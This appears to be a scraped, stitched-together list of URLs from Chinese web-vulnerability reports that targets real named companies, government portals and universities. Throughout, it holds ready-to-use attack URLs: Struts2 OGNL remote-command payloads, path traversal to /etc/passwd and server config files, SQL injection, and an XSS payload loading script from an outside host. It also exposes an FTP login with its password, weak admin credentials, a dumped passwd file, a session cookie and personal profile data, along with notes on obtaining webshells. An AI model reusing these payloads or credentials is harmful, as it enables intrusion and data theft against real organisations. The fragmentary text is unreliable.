http://hd.kdzz.kongzhong.com/rank/checklogin.php?act=login&callback=jQuery18005518103167414665_1389880232572&password=%C7%EB%CA%E4%C8%EB%C3%DC%C2%EB&username=%5c&_=1389880234466 http://kefu.linekong.com/eService/system/inputLogin.do http://lh.linekong.com/eADUnion/login/index.do http://office.homeinns.com/HCS/ http://e-learning.lenovo.com.cn/user/registration/reseller http://home.verycd.com/cp.php?ac=album&op=editpic&albumid=166749&picid=2827186 http://bbs.sf-express.com/portal.php http://bbs.sf-express.com/config/config_global.php.bak http://home.verycd.com/space.php?uid=19436563&do=mtag&tagid=15625 http://home.verycd.com/space.php?uid=19436563&do=mtag&tagid=15625可加入分组发话题- http://home.verycd.com/space.php?uid=19436563&do=mtag&tagid=15625 http://58.246.233.197/ http://58.246.233.197/Smstatistics.aspx?site=5LiK5rW35oC76YOo http://58.246.233.197/Sms/main.htm对各网点短信平台进行基础管理 http://www.xinyuan.com.cn/ http://www.hngp.gov.cn http://www.hngp.gov.cn/xygh/cx/xyindexserch.html?webappcode=H60&keyword=123 http://www.hngp.gov.cn/xygh/egp/jd/dljg/dljgxx/ListDljg,$DirectLink.direct?sp=S1&sp=S00390019 http://home.verycd.com/cp.php?ac=thread&op=digest&tagid=15626&tid=2815255&inajax=1 http://xy001.52xinyou.cn/api/webaction.ashx http://www.lxjx.cn/Lists_type.aspx?BigClassName=考证须知 http://mp.linekong.com/login/login.do URL:http://www.shmetro.com/admin/ http://drops.wooyun.org/papers/548 http://sc.bj.chinamobile.com/ http://sc.bj.chinamobile.com:9090/mscp/ http://sc.bj.chinamobile.com:9091/mscp_wlan/index.jsp http://zz19z.zzedu.net.cn/ http://zz42z.zzedu.net.cn/admin_index.asp的后台。没想到人品爆发。弱口令直接进入了。又因为服务器是iis6的。后台又可以备份。就利用IIS6备份get了shell。进入shell一看。发现全郑州的中学都在这里。。太刁了。 http://www.software.zjut.edu.cn/info.php?id=4147 www.software.zjut.edu.cn下随便一个链接都能射……求轻虐 http://bbs.fumu.com/tj/ad.php?a=56 ftp://xradm:147258369@203.158.19.51 http://career.ecust.edu.cn/zxzxcp/zc_company.php http://career.ecust.edu.cn/zxzxcp/sx_manage.php http://love.hangzhou.com.cn/准备上传靓照寻找真爱 http://log.91.com/index.php/Index/login http://light.91.com/ http://foc.sf-express.com/bbs/login.aspx http://foc.sf-express.com/bbs/admin/global/global_templatesedit.aspx?path=../tools/&filename=xxx.aspx&templateid=1&templatename=Default http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.baidu.com&showcount=0&desc=baidu&summary=baidu&site=baidu&pics=http%3A%2F%2Fwww.baidu.com%2Fimg%2Fbdlogo.gif%23%22%20onload%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2F%2Fxxx.xxx.xxx%2FwowS3i%3F1390008412%27%3Bdocument.body.appendChild%28s%29%3B&style=202&width=105&height=31&otype=share&showcount= http://www.wdshopping.com/search-results.php?id=90&catid=16 http://shop.wwtx.cn/index.php http://shop.wwtx.cn/store/1025207/category/11490/page_%5c http://shop.wwtx.cn/index.php?act=index&app=search&keyword=1&page=%5c&Submit=%cb%d1%cb%f7 http://paimai.wwtx.cn/auction.php?act=auction_auto_info&act=auction_auto_info&add_range=50&id=1815 http://shop.hangzhou.com.cn/detail.jsp?CID=0109 http://eb.elong.com/isajax/ForgetPass/GetHotelStaffInfo?Name=admin http://www.pp.cc/manage/sale/newer inurl:/admin.php,想找一下关于Discuz的默认后台信息,结果看到一个选课系统,遂进之 http://cs.whu.edu.cn/thesis/admin.php?act=keti.all&zyid=0&sys=1 http://cs.whu.edu.cn/thesis/ http://cs.whu.edu.cn/thesis/admin.php?act=keti.all&zyid=0&sys=1 http://me.07073.com/ http://hn.whsp.gov.cn/index.action google:Powered http://221.238.**.***:8082/redmine/ http://demo.taodiantong.cn/?do=../../../../../../../../../../etc/passwd%00.jpg&mod=faq http://www.baison.com.cn/manage/web/index.php http://218.242.57.204:8382/ http://target.url/website/dflz/dflzSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_002 http://ygnl.szdflz.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_002 http://dflz.meizhou.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=441400&issueTypeCode=S_003 http://59.34.3.90/website/dflz/dflzSiteAction!sjList.action?orgCode=441285&issueTypeCode=S_002 http://219.129.166.87/website/dflz/dflzSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_002 http://dflz.maoming.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=440900&issueTypeCode=S_003 http://dwgk.szdflz.gov.cn/website/dwgk/dwgkSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_010 http://www.cwgk.gz.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=440100&issueTypeCode=S_004 http://www.lyairport.net/manage03/index.asp http://www.lyairport.net/about.asp?title=%C1%AA%CF%B5%CE%D2%C3%C7&xs=597 http://www.lyairport.net/hd.asp?title=%C1%D9%D2%CA%BC%F2%BD%E9&xs=618 http://www.lyairport.net/list_news.asp?id=634 http://www.lyairport.net/list_zw.asp?id=667 http://118.144.75.63/login.action http://118.144.75.34/index.action http://oa.homeinns.com/OA/Login.aspx?ReturnUrl=%2foa%2f http://zhi.lenovo.com.cn/ http://mail.cpd.com.cn/,使用的是zimbra的邮件系统 http://mail.cpd.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://mail.gzcb.com.cn/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../opt/zimbra/conf/localconfig.xml%00 http://wizard.stock.hexun.com/tzxy/kk.aspx?teacher=%C0%EE%F6%CE http://www.syhzy.cn/ http://218.106.133.143/sigma/newspre1.asp?seq=23 http://mail.hualala.com/,使用的是zimbra的邮件系统 http://www.exploit-db.com/exploits/30085/ http://mail.hualala.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://ideaclub.lenovo.com.cn/survey/ http://copyright.tudou.com/cpmanage/system/admin-login http://fwpt.sme.gov.cn/ http://fwpt.sme.gov.cn/page/service_item_query.jsp?menuIndex=12 http://spm3.lenovo.com.cn http://spm3.lenovo.com.cn/ewebeditor/uploadfile/20140127194359462.aspx http://spm3.lenovo.com.cn/ewebeditor/admin/default.aspx cn:c4828092ad389b22fcdd568e3dd11a06 http://drops.wooyun.org/papers/548 http://datainfo.stock.hexun.com/hybk/dygs.aspx?fld_areano=323000000 http://product.yesky.com/product/441/441620/maintain.shtml?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29 http://218.58.156.220:8002/yxxt/web/zzfw_index.do http://xg.glut.edu.cn:8080/yxxt/web/zzfw_index.do http://yxxt.yngsxy.net:8081/yxxt/web/zzfw_index.do http://yx.heuet.edu.cn/yxxt/web/zzfw_index.do http://www.eeti.com.cn/getCompanyIntro.action softcoreonline.huawei.com/front/app!checkMobile.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29 http://maintain.org.hc360.com/maintain/User/login.action http://maintain.org.hc360.com/maintain/xxxx.jsp http://zhidao.taobao.com/baobei/-713DBCD3B7CABCD3B4F3C4D020C5A3D7D0BFE326773DBCD3B7CABCD3B4F3C4D020C5A3D7D0BFE3.html http://rel.lenovo.com.cn/rel/submit.php http://www.4008266333.com/My97DatePicker/datepicker/skin/whyGreen/direct.aspx PAY:String= http://www.eqjl.gov.cn/main.action http://221.182.104.170:9010/wap/tblLineAction!getLineByStopNo.action?stopNo=CDS&leaveDate=2014-1-28&lineNo=CDS http://221.182.104.170:9010/articles!loadHelps.action已修复,应该是不同的应用吧。 http://183.203.151.62/LoginPage.aspx http://218.204.36.28/license!getExpireDateOfDays.action http://sapel.quantatw.com/newsdetail.php?nno=19 http://i.yinyuetai.com/27902219/blog/detail/780447?page= www.ccgp-shaanxi.gov.cn/download?fileName=../../conf/tomcat-users.xml www.ccgp-shaanxi.gov.cn/download?fileName=WEB-INF/web.xml www.ccgp-shaanxi.gov.cn/download?fileName=../../../../../../../etc/passwd www.ccgp-shaanxi.gov.cn/download?fileName=../../../../../../../../etc/sysconfig/network www.ccgp-shaanxi.gov.cn/download?fileName=../../../../../../../../etc/services http://baa.bitauto.com/bora/thread-5088548-3.html#43078421 http://tv.sohu.com/s2014/msyh/index.shtml),登陆搜狐账号,再次打开活动页面,点击“立即订购” http://116.228.55.12/做案例,注入点: http://bl.gamebbs.qq.com/ http://bl.gamebbs.qq.com/uc_server/ http://www.cq.gov.cn/publicinfo/web/views/Show!index.action http://fwpt.sme.gov.cn/page/query.do?method=getInfoDetail&id=30 http://fwpt.sme.gov.cn/assistant/admin/admin_main.jsp?menuIndex=22 http://beijing.ganchang.cn/ http://beijing.ganchang.cn/categorylist/index.html?id=23%27 http://wooyun.org/bugs/wooyun-2013-045893 http://61.191.25.190:8080/osm2/ http://61.191.25.190:8080/osm2/adminInfo!login.action http://ue.feixin.10086.cn/ http://ue.feixin.10086.cn/vote/myExper.action http://www.yinyuetai.com/fanclub/topic-detail/268262 http://www.yinyuetai.com/fanclub/create-fan-topic-reply http://t.cn/8FJAIp9 http://code.google.com/p/google-glass-api/issues/detail?id=391 http://www.whctpasc.gov.cn/Broadcast/Broadcast.aspx?type=InfoBLLChT&title=%B2%A2%C1%AA%C9%F3%C5%FA%C1%F7%B3%CC%CD%BC http://www.whsfzb.gov.cn/Broadcast/broadcast.aspx?type=ZXWJ&page=2 http://www.wdaac.cn/Broadcast/broadcast.aspx?type=infovide&page=2 http://www.whgqjjjc.gov.cn/Broadcast/Broadcast.aspx?type=jzcm http://www.sdsp.cn/Broadcast/Broadcast.aspx?type=ZXDT_ZhXXW&title=%D6%D0%D0%C4%D0%C2%CE%C5 http://www.bnzw.gov.cn/Broadcast/Broadcast.aspx?type=infogsgg http://www.shspzx.gov.cn/Broadcast/Broadcast.aspx?type=qsydw http://222.135.78.34:8085/Broadcast/Broadcast.aspx?type=xxgg http://222.135.78.34:8089/Broadcast/broadcast.aspx?type=ZXDT_ZhXXW&page=2 http://www.mgxzfw.gov.cn/broadcast/broadcast.aspx?type=infotpxw http://www.nbjdzw.gov.cn/Broadcast/Broadcast.aspx?type=spbz http://www.yongtai.gov.cn:8080/LangChao.ECGAP.OutPortal/Broadcast/Broadcast.aspx?type=InfoTPXW http://jnsp.qingdao.gov.cn/Broadcast/Broadcast.aspx?type=xxgg http://www.5210.cn/Broadcast/Broadcast.aspx?type=infozwgk http://www.lxxzfw.com/Broadcast/Broadcast.aspx?type=grb http://www.bzxzspzx.gov.cn/Broadcast/Broadcast.aspx?type=InfoZWGK_gzzd http://shenpi.xiangxian.gov.cn/Broadcast/Broadcast.aspx?type=InfoGKZN http://www.xtsxzfw.gov.cn/BroadCast/broadcast.aspx?type=ysba http://www.lyxzfwzx.gov.cn/Broadcast/Broadcast.aspx?type=grb http://60.6.212.230:8090/Broadcast/Broadcast.aspx?type=grb http://www.sdrcjjjc.gov.cn/Broadcast/Broadcast.aspx?type=jyjl http://www.bxxxzfwzx.gov.cn/Broadcast/Broadcast.aspx?type=xxgg http://www.wdjjjc.gov.cn/Broadcast/Broadcast.aspx?type=zxxw http://www.sqdzjc.gov.cn/Broadcast/Broadcast.aspx?type=infoTSJJ&parentType=infoTSJJ https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx http://i4.imgs.letv.com/.svn/entries http://bureau.cctv.com/register.php http://bureau.cctv.com/ziliaoku.php?z_id=89 url:gtp.sme.gov.cn http://202.85.212.150/jszx/index.action http://zwdt.tz.gov.cn/riseapprove_web/admin.jsp http://58.221.162.227:9080/riseapprove_web/bmsltxDetail.do baidu:cms/app/info/ http://www.wlyz.net/cms/app/info/doc/index.php/25957* http://www.cpecartoon.com/Admin/index.aspx http://jjdsdc.com/ http://jjdsdc.com/System http://www.snciq.gov.cn:6198/car/login.action http://125.72.14.80/ http://dellcqg.renren.com/Qa/ask http://www.mothercj.yst.com.cn/app/yy_home.action http://www.fzcj.com/News_list.aspx?title=1 http://www.fzcj.com/FxsShouyi.aspx?pid=3 http://drops.wooyun.org/papers/548 http://jwmis.hhtc.edu.cn/ZNPK/Private/list_xnxqkc_js_skbj.aspx?id=1 http://jwmis.hhtc.edu.cn/ZNPK/Private/list_xnxqjxjckc_skbj.aspx?id=1 inurl:member/index.php?ugid31=51 http://pinyin.sogou.com/dict/ywz.zip http://www.ztdq2.com:99/index.asp?id=228 ftp://61.143.169.61 http://www.fecb.com.cn/TV_photo.asp?sId=17001 http://sharpshooter.yesky.com/ http://www.tyxd.gov.cn/gov/private/login.action http://127.0.0.1/admin/databack/sql/metinfo_met_20140202_ixzlfo_1.zip http://127.0.0.1/admin/databack/sql/metinf~1.zip http://www.hikvision.com/ http://avic-sae.com.cn/NewsParticular.aspx?info_id=1470 www.alumnipower.net http://weibo.com/u/3022690473# http://system.greentree.com.cn:8080/op/module_erp/user.txt www.wooyun.org www.wooyun.org www.wooyun.org http://www.casm.ac.cn/ http://www.casm.ac.cn/kjcx.php?col=95&file=3036 http://www.casm.ac.cn/index2.php?col=14&file=4795 http://www.casm.ac.cn/yjygk.php?col=88&file=1&onlyOne=1 http://www.casm.ac.cn/news.php?col=93&file=4846 http://www.casm.ac.cn/ztbd.php?col=132&file=2273 http://www.casm.ac.cn/kjcj.php?col=120&file=1891&onlyOne=1 http://www.casm.ac.cn/cgzh.php?col=101&file=3801&onlyOne=1 http://www.casm.ac.cn/yjdw.php?col=28&file=1739&onlyOne=1 http://www.casm.ac.cn/kyzc.php?col=34&file=241&onlyOne=1 http://www.casm.ac.cn/yjpy.php?col=37&file=3690 http://www.casm.ac.cn/zcfg.php?col=112&file=1713 http://training.cnca.cn/cms/whatycms/ArtiSearch.do http://www.ngmzj.gov.cn/htmlpages/news.asp?id=1747 http://tieba.baidu.com/f/commit/share/openShareApi?url=http%3A%2F%2Fshare.baidu.com%2F%230-tieba-1-78014-7eff13ea8df1a334a227e1223f8d0dd3&title=%B0%D9%B6%C8%B7%D6%CF%ED%A3%AC%CE%AA%C4%FA%B4%F8%C0%B4%B8%FC%B6%E0%C1%F7%C1%BF%20-%20%B0%D9%B6%C8%B7%D6%CF%ED&desc=&comment= http://tieba.baidu.com/f/commit/share/openShareApi?url=http%3A%2F%2Fwww.baidu.com&pic=http://www.google.com/images/srpr/logo11w.png http://iservice.qiaqiafood.com:8003/ http://study.dlteacher.com/ http://bj.wo.com.cn/xysz/llmm.action http://vendor.wanda.cn/signup/index.action http://www.eeb.cn/youth/plug/book.asp?t0=WCRTESTINPUT000000&t2=WCRTESTINPUT000001&t4=WCRTESTINPUT000002&t1=WCRTESTTEXTAREA000003&t3=0 http://hdsyxx.net:85/phpinfo.php http://ftds.idin.ac.cn/cn/index.do http://news.gdredcross.org.cn/web/news_view.asp?id=1948 http://lohohd.juran.com.cn/frontIndex.do http://www.jinyuan.gov.cn/jyq/private/login.action http://www.tyxd.gov.cn/gov/private/login.action http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNr******2&t=634******** http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2 http://hters.htinns.com/HTERS/ScriptResource.axd?d=pIn6KUKoUCvN15ROF5KiVDwb87TWlbfzq78**********AAAAAAA0 http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 http://news.jiapin.com/tagjs.html?id=59&keyword=%E4%BD%B3%E5%93%81%E7%BD%91,%E5%85%AC%E5%91%8A%E6%8F%90%E7%A4%BA&contentid=3045 http://www.cttxj.com http://www.cttxj.com/yewu/yewu_news.asp?news_id=55 http://www.cttxj.com/service/service_news.asp?news_id=58 http://www.cttxj.com/about/news.asp?news_id=298 http://www.cttxj.com/yewu/HangYe_news.asp?news_id=9 http://www.ctttj.com/ http://www.ctttj.com/studylog.asp http://www.ctttj.com/studylog.asp http://www.ctttj.com/tech/train_main.asp?class1_id=1 http://www.ctttj.com/tech/train_main.asp?class2_id=1 http://www.ctttj.com/tech/train_main.asp?class3_id=1 http://www.ctttj.com/tech/awareness_show.asp?awareness_id= http://www.ctttj.com/tech/question_show.asp?question_id= http://www.ctttj.com/jsyd_show.asp?news_id=233 http://www.ctttj.com:80/jsyd_show.asp?news_id=233 http://zq.cttgd.com/ http://zq.cttgd.com/zf.asp?id=34 http://zq.cttgd.com/newinfo.asp?id=28 http://zq.cttgd.com/hisite_files http://zq.cttgd.com/images http://www.as.cttln.com/ http://www.as.cttln.com/company/article_view.asp?id=994 http://www.chinatietong.com/ http://www.chinatietong.com/serv/comment.php3?id=39 http://www.chinatietong.com/wf/comment.php3?id=17534 http://www.chinatietong.com/tech/comment.php3?id=561 http://www.chinatietong.com/dang/comment.php3?id=176 http://www.chinatietong.com/news/comment1.php3?id=3234 http://www.chinatietong.com/serv/comment1.php3?id=71 http://www.chinatietong.com/serv/comment2.php3?id=22 http://www.chinatietong.com/wf/comment3.php3?id=7117 http://www.chinatietong.com/wf/comment1.php3?id=6616 http://www.chinatietong.com/news/index.php3.bak http://www.chinatietong.com/serv/index.php3.bak http://www.chinatietong.com/news/comment.php3.bak http://www.chinatietong.com/wf/comment.php3.bak http://cmpay.10086.cn/life/publicutilitie/payment/projectpay.htm?projectid=004&areaid=290 http://market.shouji.baofeng.com/market/bd_column.php?c=tab&type=game'&market=a03&platf=android&mtype=normal&ver=3.7.97&znum=11&grade=0&os=16 http://www.weimob.com/Webwall/bigWheel?id=42&bid=5&pid=1071 Url:http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?QueType= http://www.zoomla.cn/guest/Ask/MyAskList.aspx?QueType= http://127.0.0.1/thinksaas2/index.php?app=user&ac=resetpwd&mail=admin@admin.com&set=1d8c9f71eaa6923fc9d3cd5d10aea4ce http://cloud.189.cn/t/3qYvaunEnMZn发现无需密码可直接下载,转存。 http://ecstore.shopex.cn/ http://mall.brands.com.tw/ec http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd http://wh.cscec1b.net:8080/list.asp?id=44 http://203.91.45.54:8003/webapp/login/user-login!showLogin.action http://bq.sto.cn/Login.aspx xlink:href="data:image/svg+xml;base64 http://live.shopex.cn/ http://it.homeinns.com/ito_beta/main/Login.aspx https://180.153.139.91/woa/wdcctj/report.php http://shiyan.mop.com/ site:mop.com inurl:profile http://180.153.16.67/acms/login/index.action site:mop.com inurl:profile http://table.chinanews.com/vote2008/login.php http://table.chinanews.com/vote2008/view_results.php?sid=532 http://bbs.rom.baidu.com/ site:bbs.rom.baidu.com inurl:profile http://dzda.e21.cn/dzda/login.php site:goodbaby.com inurl:profile site:traffic.96900.com.cn traffic.96900.com.cn/home/column.aspx?aid=109‎ http://www.sd.chinanews.com/channel/channel.html?lmjc=xyxw&page=1 com:8080/dede/ com:8080/phpwebbackup.php com:8080/php.php http://211.160.72.136/console/ http://210.77.176.141/1.rar http://210.77.176.141/2.rar http://www.smics.com/jp/press/press_releases_details.php?id=176305 http://www.weimob.com/Webwall/getCon weimobdev:x:508:509::/home/weimobdev:/bin/bash sftpuser:x:507:508::/home/sftpuser:/sbin/nologin annchen:x:506:507::/home/annchen:/bin/bash andy:x:505:506::/home/andy:/bin/bash alfred:x:504:504::/home/alfred:/bin/bash keiman:x:503:503::/home/keiman:/bin/bash mysql:x:501:501::/home/mysql:/sbin/nologin www:x:500:500::/alidata/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin news:x:9:13:news:/etc/news mail:x:8:12:mail:/var/spool/mail:/sbin/nologin halt:x:7:0:halt:/sbin:/sbin/halt shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown sync:x:5:0:sync:/sbin:/bin/sync lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin bin:x:1:1:bin:/bin:/sbin/nologin root:x:0:0:root:/root:/bin/bash site:pinyin.sogou.com inurl:profile http://channel.3g.youku.com/ykmks/login.do http://itbbs.pconline.com.cn/51118052_6.html http://itbbs.pconline.com.cn/51118052_6.html http://locoy.com/member/licencemgr.php?uid=9997 http://locoy.com/member/licencemgr.php?uid=9998 http://www.locoy.com/member/licencemgr.php?action=viewcode&uid=9958 http://www.locoy.com/member/licencemgr.php?action=viewcode&uid=9957 http://demo.thinksns.com/ http://andy-game.googlecode.com/svn-history/ http://ad.huaweidevice.com/upload.php https://cardholder-ppcs.chinabank.com.cn https://cardholder-ppcs.chinabank.com.cn/jsp/.svn/entries http://61.156.8.196/sms_user/login.html山东长短信系统 http://www.ncosm.gov.cn/new/upload_soft.asp http://www.ncosm.gov.cn/new/upload.asp?action=upfile http://www.ncosm.gov.cn/new/edit/upload.asp http://www.ncosm.gov.cn/bb.asp http://love.ganji.com/showlive/sixroom/index/?bgurl=http://www.baidu.com/robots.txt http://www.phpnow.org/ http://www.phpnow.org/wooyun http://sh-ecrc.com/about.asp?id=8 http://bbs.game.91.com http://www.casnw.net/news/showgg.asp?id=1899&ksflno=0 http://www.caa.gov.cn/# http://xuelong.chinare.cn/upload/ http://i.meituan.com http://i.meituan.com/risk/downsms http://i.meituan.com/risk/resetpassword http://gifts.redbull.com.cn/search/?gt_type_id=-1&ex_size_select=-1>_name=8 clzx.jmpj.gov.cn/Admin/Admin_login.asp shell:clzx.jmpj.gov.cn http://www.gzdynasty.com/content.asp?id=21 http://www.gzdynasty.com/New_list.asp?id=156 http://www.gzdynasty.com/manage/login.asp http://www.msmchina.com/index.html http://www.wlj-china.com/2013/news/news.aspx?tagName=%e4%b8%ad%e5%9b%bd%e5%a5%bd%e5%a3%b0%e9%9f%b3 http://www.3dmgame.com/1.zip http://www.3dmgame.com/sys/init.php http://www.3dmgame.net/1.zip http://www.3dmgame.net/sys/init.php http://www.topnt.cn/ http://www.EXAMPLE.com/editor/fckeditor/filemanager/upload/php/upload.php http://www.EXAMPLE.com/images/stories/editorupload/下,使用原始文件名访问即可拿到Webshell。 http://www.baidu.com/s?wd=%E6%B8%85%E9%99%A4session http://www.notc.gov.cn/cn/WorkList.aspx?m=20121227134704560301 http://zncj.ncedu.gov.cn:8100/SelfCfg/ResetPassWord.aspx http://demo.zoomla.cn/User/UserZone/GatherStrainManage/HuaTeeRevert.aspx?ID=00000000-0000-0000-0000-000000000000'%20and%20@@version%3E0--&Gid=1&menu=delete&HuaTeePicID=00000000-0000-0000-0000-000000000000 http://www.jszg.edu.cn/portal/cert/query/certinfo?_idNo=00000000000000&_certNo=20103630142000001 http://www.jszg.edu.cn/portal/cert/query/certinfo?_idNo=00000000000000&_certNo=20103630142003001 http://www.jszg.edu.cn/portal/cert/query/img/ http://www.igocctv.com http://www.igocctv.com www.igocctv.com http://staticnova.ruoogle.com/nova/default/avator/m/defaultAvatar_m_8.jpg","exp":"30","gold":"1","constellation":"0","gender":"1","nick":"别跟我得瑟你不行","height":"176","birthday":"","blood_group":"0","lastlogin_at":"2014-02-07T13:25:11+0800","max_chatgroup":"1","closed_chatgroup":"0","city_name":"直辖市 http://staticnova.ruoogle.com/photo/1111049/201402012345052_784049_266x266.jpg","exp":"400","gold":"0","constellation":"2","gender":"2","nick":"倾尽年华终是梦。","height":"165","birthday":"1996 http://www.digisea.cn/digisea.rar http://www.digisea.cn/NSW.FCKeditor/editor/filemanager/connectors/test.html# http://www.zjrjks.org/ www.zjrjks.org/interIndex.do?method=printBMB http://bj.guosen.com.cn/index.php?s=/Html/Subscribe/ http://wen.duowan.com/WEB-INF/web.xml http://wen.duowan.com/q/index http://www.jxgzedu.gov.cn http://www.gxtr9.com/test/.svn/entries http://www.gxtr9.com/dzjy/test/.svn/entries http://www.gxtr9.com/dzjy/html/images/.svn/entries http://www.gxtr9.com/dzjy/html/scripts/.svn/entries http://www.gbicom.cn/passport/forgetpass inurl:goitem.asp?id= http://211.151.130.183/ http://msm.zhidao.baidu.com/recde?intsign=830744960868581851 url:http://db-iknow-mis00.db01.baidu.com:8080/audit/diquestion?period=current&dflag=21&zoneName=%C8%CB%B9%A4%C9%F3%BA%CB%CE%CA%CC%E2 cookie:BAIDUID=419CAB796047837917BF34A3EBEDEAEA:FG=1 http://skyxss.sinaapp.com http://websites.imqq.com/go/1883/aHR0cDovL3d3dy53b295dW4ub3JnLw== http://websites.imqq.com/go/1884/aHR0cDovL3d3dy45MHBhby5jb20= http://opac.library.hn.cn http://www.edugd.cn/web/ http://one.anjuke.com http://one.anjuke.com/Login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[10000]%2c%23c.read%28%23d%29%2c%23k8team%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23k8team.println%28%23d%29%2c%23k8team.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://ka.52pk.com:80/config.inc.php.bak http://tkkw.crtvu.cn/ http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=26&_studentcode=681 http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=26&_studentcode=154344 http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=59&_studentcode=3521783 http://tkkw.crtvu.cn/unitiveexam/report/studentexamcard.aspx?_batchid=59&_studentcode=3847055 http://www.xanet.edu.cn http://www.xanet.edu.cn/detail.jsp?sort=5 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130624401048 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130626485753&forderid=000000000000008320130626485753 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130624405756 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=600104833000008320130619256383 http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=600104833100008320130620282945 url:http://wap.ks.91.com/SimpleEbook/SubjectList.aspx?id=110 ftp://sctcm.gov.cn http://wooyun.org/bugs/wooyun-2014-049646 http://www.wocloud.cn/ http://www.wocloud.cn/portal/jsp/user/changePwd.jsp?code=pwd www.wocloud.cn http://www.wocloud.cn http://dflz.zhaoqing.gov.cn/website/dflz/dflzSiteAction.action http://itembank.open.com.cn/ http://www.fpa.gov.cn/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.fpa.gov.cn/FCKeditor/editor/filemanager/connectors/test.html admin:admin:202.108.252.235 http://app.rainbowsoft.org/?zba=220 https://sso.hc360.com/ssologin?loginparam=&sourcetypeid=&logincode=&ReturnURL=http%3A%2F%2Fmy.b2b.hc360.com%2Fmy%2Fturbine%2Ftemplate%2Fcorcenter%2Cbusiness%2Csupplydetailedit.html& http://www.elecfans.com/topic/qqqun/admin admin:admin弱口令) http://wooyun.org/bugs/wooyun-2013-039159,的问题居然在内网又见面了,密码还没改。。 http://wm123.baidu.com/wm123.tar.gz http://home.sun0769.com/hd/houseTopicSurvey.action http://tour.sun0769.com/space/surveyView.action http://v.sun0769.com/channel/home.action http://jiaju.sun0769.com/home/product.action https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362 